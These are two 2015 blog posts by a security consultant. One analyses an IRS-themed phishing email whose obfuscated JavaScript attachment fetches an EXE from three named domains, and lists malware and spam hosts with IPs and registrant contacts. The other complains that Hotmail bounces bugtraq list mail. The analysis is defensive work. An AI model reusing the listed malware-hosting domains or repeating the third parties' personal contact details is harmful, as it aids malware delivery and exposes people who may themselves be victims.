Showing posts with label gmail. Show all posts
Showing posts with label gmail. Show all posts

Tuesday, September 15, 2015

An IRS tax refund phishing scam illustrates the widespread failure of hosting and antivirus providers' security measures

Scams focused on stealing tax refunds remain highly profitable, despite the fact that they are well known and understood by security professionals and the general public, and have been for years. A variety of distribution methods are used, with the common threads being the use of IRS logos and bureaucratic-sounding language to convince users to click a link, download and execute a file and/or send personally identifying information like a Social Security number. A recent example of one such a scam that I came across is a damning illustration of the failure of online service providers to protect users from obvious and simple malware distribution methods.

In the example I wish to discuss today, the distribution method was a spammed email that on a small ISP's installation of SpamAssassin (note: I am not an admin or employee of this system; I'm a customer) received an X-Spam-Status score of 5.3 after being flagged with the following variables:

X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
 CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
 HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
 PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no  
        autolearn=disabled version=3.4.0 

While the default SpamAssassin threshold for marking a message as spam is 5.0, few admins leave this default value. SpamAssassin itself recommends that admins of multiple user mail servers use a threshold of 8 to 10. I don't have this ISP's spamassassin.conf file, and its obviously been customized. My point here isn't to take issue with SpamAssassin, which I have used for many years, but to demonstrate how this message made its way to mailboxes through pretty solid security software despite these being included in the headers:

From: "Internal Revenue Service" <office@irs.gov> 
Reply-To: "Internal Revenue Service" <office@irs.gov>  
Return-Path: <servers@abitindia.com>

Here's another depressing bonus. In addition to SpamAssassin, the recipient mail server had clamav installed. The message had a .ZIP file attachment, and the mail server's clamav install marked it as clean:

X-Virus-Scanned: clamav-milter 0.98.7 at mx1.riseup.net
X-Virus-Status: Clean


The attachment does in fact have a javascript nasty-ware. And clamav is not alone in its failure to pick up the file. According to Virustotal, 31 out of 56 AV platforms failed to detect this file - including Symantec, TrendMicro, Panda, Malwarebytes, Avast and Avira. In defense of these AV heavyweights, the file used a single basic obfuscation function to disguise its purpose - which at the moment is apparently enough to fool these AV packages.


One round through Einar Lielmanis' JS Beautifier later, and we have this:


The script creates an EXE file in the %TEMP% directory - usually something like C:\Users\UserName\AppData\Local\Temp - that is named some random string, and fills it with a bunch of garbage that it retrieves from one of the three domain names listed: dickinsonwrestlingclub.com, syscomm.smartlanka.net or les-eglantiers.fr.

There are a number of domains and hosts associated with this scam.



Malware domains
Domain IP Host Registrant Contact DNS IPs
dickinsonwrestlingclub.com 72.20.64.58 Consolidated Telcom Perfect Privacy, LLC N/A 72.20.64.11, 72.20.64.12
syscomm.smartlanka.net 69.89.31.73 box273.bluehost.com / Bluehost / Unified Layer Dilhan Seneviratne prabhath247@gmail.com 74.220.195.31, 69.89.16.4
les-eglantiers.fr 76.74.242.190 hp92.hostpapa.com / Peer 1 Network / Cogeco John Huisman / Camping Beau Rivag huisman.huisman@orange.fr 69.90.36.133, 204.15.193.53



Spam domains
Domain IP Host Email Provider Contact DNS IPs
abitindia.com 54.165.102.41 Amazon EC2 Gmail accounts@abitindia.com 50.23.136.229, 50.23.75.96, 162.251.82.118, 184.173.150.57
mail.netspaceindia.com 74.54.133.186 The Planet N/A help@netspaceindia.com 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214
netspaceindia.com 104.131.68.147 Digital Ocean N/A help@netspaceindia.com 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214



Taking a look at the hosts involved in this scam provides even further disappointment. abitindia.com, whose email is managed by Gmail, is providing the return-path for the spam messages but not the reply-to. Replies, incredibly, go directly to the IRS support email address. The reply-to header is commonly forged so that backscatter goes to some random sucker. In this case, abitindia.com is affiliated with the sender domain netspaceindia.com:

Domain Name: ABITINDIA.COM
Updated Date: 2014-11-24T05:21:07Z
Creation Date: 2006-11-23T19:31:19Z
Registrar Registration Expiration Date: 2015-11-23T19:31:19Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrant Name: Netspaceindia
Registrant Organization: Netspaceindia
Registrant Street: Hall no 3, Wing B, Parshuram apt Above Woodlands Showroom College Road Nashik
Registrant City: Nashik
Registrant State/Province: Maharashtra
Registrant Postal Code: 422005
Registrant Country: IN
Registrant Phone: +91.9975444464
Registrant Email: accounts@abitindia.com
Name Server: dns1.netspaceindia.com
Name Server: dns2.netspaceindia.com
Name Server: dns3.netspaceindia.com
Name Server: dns4.netspaceindia.com


In other words, in many circumstances backscatter recipients are innocent victims. That is not the case here - the sender is managing the backscatter recipient address, likely to keep their mailing lists updated. As such, Google could play a role in putting a stop to this scam - a review of the backscatter would make the relationship between sender and backscatter recipient obvious, and in an ideal world would precipitate the suspension of the Google Apps account for "abitindia.com".

To be fair, Google's responsibility here is minimal - particularly when compared to the role that every other hosting provider plays in this. The Planet and Digital Ocean are providing the infrastructure for the spam campaign, while Bluehost, Cogeco and Consolidated Telcom are providing the infrastructure for hosting the malware. Its likely that the accounts for these providers were created using fraudulent/stolen payment information, or legitimate accounts were compromised. This sort of thing is an everyday occurrence for hosting providers; for providers who do not invest in abuse response, these types of scams can use the same accounts with the same hosting providers for months if not years. When I come across this sort of scam, I do my best to inform the hosting providers involved using the abuse contact information that is required to be associated with IP/DNS registrations, along with enough evidence for the provider to confirm Im not a nut. It is unusual to receive a response and even more unusual to receive a non-automated response. It is just as unusual for hosting provider staff to review their abuse@ contacts, let alone resolve the issues they receive.

Hemming and hawing over the need for state intervention to prevent "cyber-attacks" (vomit) and scams like the ones described here are all over the place. Many of those who support such a view make it a point to justify government intervention because of the incredible sophistication and technical complexity of the scams that plague internet users. However, the overwhelming volume of the scams I have encountered over the course of my career involved well known techniques and software. There is significant room for improvement in security practices with applying what we already know: like how to prevent (or rapidly stop) a 30 year old scam using 20 year old spam techniques to circulate 10 year old malware.

Tuesday, July 28, 2015

Hotmail is bouncing bugtraq mailing list emails from Yahoo

What really irks me about this is that I deliberately use gigantic, stupid MTAs like gmail and live mail to deliberately avoid this sort of garbage (deliberately). Those familiar with administrating large volume email can appreciate that you can perfectly configure your mail server and end up bounding all over the place because almost everyone with a mail server is not an actual email administrator and has no clue what they are doing. Email, like high school, is ultimately all about popularity. Even the least competent of email server owners will eventually get tech support to make sure google and microsoft can deliver to and receive from their Zimbra abomination.

At least that's what I figured until I started getting bounces like the one below. It seems Microsoft has decided that Security Focus mailing lists are too dangerous. To step up the oddity of this policy, bounces only occur when the originating MTA is with Yahoo. I can receive email directly from securityfocus.com. I can receive email from securityfocus.com when the originating mail server is a one-off IP address from Finland that is part of a DSL netblock. But Yahoo is a bridge too far. Stupid stupid stupid.

Return-Path: <>
Received: (qmail 22048 invoked from network); 15 Jul 2015 15:26:46 -0000
Received: from sf01mail1.securityfocus.com (HELO mail.securityfocus.com) (192.168.120.35)
by lists.securityfocus.com with SMTP; 15 Jul 2015 15:26:46 -0000
Received: (qmail 27445 invoked by alias); 15 Jul 2015 15:26:31 -0000
Received: (qmail 21710 invoked from network); 15 Jul 2015 15:26:06 -0000
Received: from sf01smtp2.securityfocus.com (192.168.120.34)
by mail.securityfocus.com with SMTP; 15 Jul 2015 15:26:06 -0000
Received: by sf01smtp2.securityfocus.com (Postfix)
id E771981455; Wed, 15 Jul 2015 10:31:59 -0700 (PDT)
Date: Wed, 15 Jul 2015 10:31:59 -0700 (PDT)
From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-55766-(redacted)=live.com@securityfocus.com
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="5D865812F6.1436981490/sf01smtp2.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20150715173159 data-blogger-escaped-.e771981455="" data-blogger-escaped-sf01smtp2.securityfocus.com="">

This is a MIME-encapsulated message.

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii

This is the mail system at host sf01smtp2.securityfocus.com.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

The mail system

<(redacted)="" live.com="">: host mx4.hotmail.com[65.55.92.152] said: 550 5.7.0
(SNT004-MC2F10) Unfortunately, messages from (143.127.139.113) on behalf of
(yahoo.com) could not be delivered due to domain owner policy restrictions.
(in reply to end of DATA command)

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; sf01smtp2.securityfocus.com
X-Postfix-Queue-ID: 5D865812F6
X-Postfix-Sender: rfc822; (redacted)@securityfocus.com
Arrival-Date: Wed, 15 Jul 2015 10:18:42 -0700 (PDT)

Final-Recipient: rfc822; (redacted)@live.com
Action: failed
Status: 5.7.0
Remote-MTA: dns; mx4.hotmail.com
Diagnostic-Code: smtp; 550 5.7.0 (SNT004-MC2F10) Unfortunately, messages from
(143.127.139.113) on behalf of (yahoo.com) could not be delivered due to
domain owner policy restrictions.

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from lists.securityfocus.com (lists.securityfocus.com [192.168.120.36])
by sf01smtp2.securityfocus.com (Postfix) with QMQP
id 5D865812F6; Wed, 15 Jul 2015 10:18:42 -0700 (PDT)
Precedence: bulk
(redacted)
Delivered-To: mailing list (redacted)@securityfocus.com
Delivered-To: moderator for (redacted)@securityfocus.com
Received: (qmail 9417 invoked from network); 15 Jul 2015 10:14:32 -0000
Date: Wed, 15 Jul 2015 10:14:31 GMT
Message-Id: <201507151014 data-blogger-escaped-.t6faevnw013232="" data-blogger-escaped-sf01web2.securityfocus.com="">
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: (redacted)@yahoo.com
To: (redacted)@securityfocus.com
Subject: XSS vulnerability in OFBiz forms

Billing systems development now available

Good news for current and future clients of Josh Wieder Technical Consulting : customers can now retain a variety of unique services related...